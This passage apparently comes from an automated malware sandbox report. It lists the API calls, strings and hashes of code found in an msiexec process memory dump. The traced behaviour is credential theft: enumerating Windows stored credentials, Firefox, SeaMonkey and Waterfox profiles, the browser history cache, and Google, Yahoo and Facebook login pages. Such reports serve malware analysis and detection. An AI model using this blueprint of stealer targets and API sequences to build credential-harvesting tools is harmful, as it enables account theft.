                                                                                                      • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                      • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                      • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                      • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                      • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                      • String ID:
                                                                                                      • API String ID: 3715365532-3916222277
                                                                                                      • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                      • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                      • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                      • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                        • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                        • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                        • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                        • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                        • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                      • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                      • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                      • String ID: bhv
                                                                                                      • API String ID: 4234240956-2689659898
                                                                                                      • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                      • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                      • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                      • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                      • API String ID: 2941347001-70141382
                                                                                                      • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                      • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                      • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                      • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                      • String ID:
                                                                                                      • API String ID: 2827331108-0
                                                                                                      • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                      • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                      • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                      • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040C298
                                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                      • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                      • wcschr.MSVCRT ref: 0040C324
                                                                                                      • wcschr.MSVCRT ref: 0040C344
                                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                      • GetLastError.KERNEL32 ref: 0040C373
                                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                      • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                      • String ID: visited:
                                                                                                      • API String ID: 1157525455-1702587658
                                                                                                      • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                      • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                      • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                      • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                      • memset.MSVCRT ref: 0040E1BD
                                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                      • free.MSVCRT ref: 0040E28B
                                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                        • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                        • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                      • _snwprintf.MSVCRT ref: 0040E257
                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                      • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                      • API String ID: 2804212203-2982631422
                                                                                                      • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                                      • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                      • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                                      • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                        • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                      • memset.MSVCRT ref: 0040BC75
                                                                                                      • memset.MSVCRT ref: 0040BC8C
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                      • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                      • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                      • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 115830560-3916222277
                                                                                                      • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                      • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                      • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                      • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                      • _wcslwr.MSVCRT ref: 0040C817
                                                                                                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                      • wcslen.MSVCRT ref: 0040C82C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                      • API String ID: 2936932814-4196376884
                                                                                                      • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                      • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                      • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                      • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                      • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                      • wcslen.MSVCRT ref: 0040BE06
                                                                                                      • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                      • memset.MSVCRT ref: 0040BE91
                                                                                                      • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                      • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                      • wcschr.MSVCRT ref: 0040BF24
                                                                                                      • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                      • String ID:
                                                                                                      • API String ID: 697348961-0
                                                                                                      • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                      • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                      • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                      • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00403CBF
                                                                                                      • memset.MSVCRT ref: 00403CD4
                                                                                                      • memset.MSVCRT ref: 00403CE9
                                                                                                      • memset.MSVCRT ref: 00403CFE
                                                                                                      • memset.MSVCRT ref: 00403D13
                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                      • memset.MSVCRT ref: 00403DDA
                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                      • String ID: Waterfox$Waterfox\Profiles
                                                                                                      • API String ID: 1829478387-11920434
                                                                                                      • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                      • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                      • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                      • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00403E50
                                                                                                      • memset.MSVCRT ref: 00403E65
                                                                                                      • memset.MSVCRT ref: 00403E7A
                                                                                                      • memset.MSVCRT ref: 00403E8F
                                                                                                      • memset.MSVCRT ref: 00403EA4
                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                      • memset.MSVCRT ref: 00403F6B
                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                      • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                      • API String ID: 1829478387-2068335096
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00403FE1
                                                                                                      • memset.MSVCRT ref: 00403FF6
                                                                                                      • memset.MSVCRT ref: 0040400B
                                                                                                      • memset.MSVCRT ref: 00404020
                                                                                                      • memset.MSVCRT ref: 00404035
                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                      • memset.MSVCRT ref: 004040FC
                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                      • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                      • API String ID: 1829478387-3369679110
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                      • API String ID: 3510742995-2641926074
                                                                                                      APIs
                                                                                                      • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                      • GetLastError.KERNEL32 ref: 0041847E
                                                                                                      • free.MSVCRT ref: 0041848B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateErrorFileLastfree
                                                                                                      • String ID: |A
                                                                                                      • API String ID: 981974120-1717621600
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                        • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                        • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                      • memset.MSVCRT ref: 004033B7
                                                                                                      • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                      • wcscmp.MSVCRT ref: 004033FC
                                                                                                      • _wcsicmp.MSVCRT ref: 00403439
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                      • String ID: $0.@
                                                                                                      • API String ID: 2758756878-1896041820
